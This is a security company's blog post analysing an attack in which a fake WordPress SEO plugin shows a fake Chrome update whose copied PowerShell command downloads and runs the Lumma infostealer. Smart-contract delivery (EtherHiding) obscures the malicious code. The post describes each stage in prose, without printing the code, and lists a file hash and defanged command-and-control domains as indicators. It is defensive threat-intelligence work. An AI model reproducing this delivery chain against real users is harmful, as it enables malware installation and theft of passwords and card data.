EtherHiding and Fake-Updates Used to Deliver Malware

etherhiding

By Anthony Jirouschek, Security Architect

We recently observed an attack using EtherHiding to deliver Fake-Updates malware, which eventually resulted in an infostealer named Lumma being installed.

EtherHiding is essentially using smart contracts on a crypto platform to obscure and deliver malicious code. In this case, the threat actor used Binance's Smart Chain contracts. EtherHiding is a relatively new technique that will likely continue to be a method of attacks as cryptocurrency and platforms gain followings. For this attack to work, the user has to be directed to the smart contract in order to be presented with the malicious logic. That is where Fake-Updates comes into play.

Fake-Updates are used to trick the end user into downloading what they think is legitimate software and typically mimic the pages of common software, like browsers. Because of this, a user would need to browse to a compromised website, which would execute the malicious JavaScript displaying the Fake-Update window or popup.

In the case we recently observed, a WordPress admin was compromised and then leveraged to install a malicious WordPress plugin. The plugin was masquerading as "GoogleRank", which purported to be a Google SEO plugin. This plugin would inject the malicious JavaScript that presents the user with a fake update for Google Chrome containing two buttons: "Copy Fix" and "Close".

Figure 1. Fake Google Chrome update page
Figure 1. Fake Google Chrome update page

The "Copy Fix" button contains a PowerShell cradle. If copied and executed by the user, it will start the infection chain.

Figure 2. De-obfuscated PowerShell cradle
Figure 2. De-obfuscated PowerShell cradle

The URL is pointing to an HTML page, but is later being executed with the IEX or Invoke-Expression command indicating that it might actually be plaintext.

Figure 3. De-obfuscated host.html
Figure 3. De-obfuscated host.html

The host.html page is actually just another PowerShell cradle similar to Figure 2 with some extra commands. This cradle is attempting to download ssl.zip from the same website and "/apple/domain/" path as before using the same User Agent.

It then attempts to write the file into a randomly named directory in the user's temp directory. Once it's been written, it extracts the file from the archive and then sleeps for 2 seconds. Finally, it attempts to start the file that has been extracted. In this instance, it was a binary named "MetaTrader5.exe".

Figure 4. MetaTrader5.exe
Figure 4. MetaTrader5.exe

If you have ever dabbled in Foreign Exchange (ForEx), you've probably heard of MetaTrader. If you haven't, MetaTrader is an application that allows you to trade various currencies and some stocks depending on the brokerage used. It's not obvious why the threat actor used the name MetaTrader as it likely would not apply to most people on the internet. What is clear is this likely isn't the MetaTrader app. So what is it?

Figure 5. SHA256 of MetaTrader5.exe - 
0b502d9c21d2bed10365e82b1c85866360c215f61c7ea3b8ed4f5c34a18c656e
Figure 5. SHA256 of MetaTrader5.exe - 0b502d9c21d2bed10365e82b1c85866360c215f61c7ea3b8ed4f5c34a18c656e

Checking the hash in VirusTotal shows the file has also been uploaded with the name "steam.exe". At the time of writing (11 days after originally discovering this chain), the file is detected by 50 of 74 vendors. Some of the vendors also classify this file as belonging to the Lumma infostealing malware family. Infostealers continue to be a threat as they can steal your personal data like passwords and credit cards from your device and upload it to the threat actors.

Figure 6. Attack Graph
Figure 6. Attack Graph
https://discoverymaidykew[.]shop/api
https://marathonbeedksow[.]shop/api
https://feighminoritsjda[.]shop/api
https://pleasurenarrowsdla[.]shop/api
https://falseaudiencekd[.]shop/api
https://raiseboltskdlwpow[.]shop/api
https://justifycanddidatewd[.]shop/api
https://strwawrunnygjwu[.]shop/api
https://richardflorespoew[.]shop/api

For a complete list of IOCs and related activity, please use the VirusTotal link and your favorite sandbox, like Joe Sandbox, AnyRun, VMRay, etc.

If you have an issue you would like WYRE to investigate, please contact us.

This activity was originally reported by Mike Small, our Penetration Testing partner over at Tandem Cyber Solutions.

Posted in ,